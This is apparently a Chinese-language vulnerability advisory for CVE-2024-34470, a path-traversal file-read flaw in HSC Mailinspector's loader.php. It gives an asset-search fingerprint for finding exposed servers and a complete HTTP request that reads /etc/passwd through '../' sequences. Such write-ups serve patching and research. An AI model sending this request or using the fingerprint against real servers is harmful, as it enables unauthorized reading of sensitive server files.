HSC Mailinspector loader存在任意文件读取漏洞(CVE-2024-34470)
一、漏洞简介
HSC Mailinspector是一款邮件安全解决方案,旨在保护企业邮件系统免受垃圾邮件、恶意软件和其他类型的网络威胁。该解决方案可以检测和过滤垃圾邮件、病毒、木马和其他类型的恶意软件,并提供详细的报告和日志记录,以帮助管理员跟踪和分析邮件流量。 HSC Mailinspector loader接口处存在任意文件读取漏洞(CVE-2024-34470),恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。
二、影响版本
- HSC Mailinspector
三、资产测绘
body="mailinspector/public"
四、漏洞复现
GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive